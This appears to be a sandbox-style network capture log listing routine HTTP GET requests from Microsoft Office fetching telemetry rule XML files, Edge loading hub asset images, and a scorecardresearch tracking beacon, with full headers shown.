Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b?rn=1731389013838&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39559DFC669A689A222688C967CD69C0&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b2?rn=1731389013838&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39559DFC669A689A222688C967CD69C0&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=15546d9e7161bb1576cd54f1731389016; XID=15546d9e7161bb1576cd54f1731389016
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
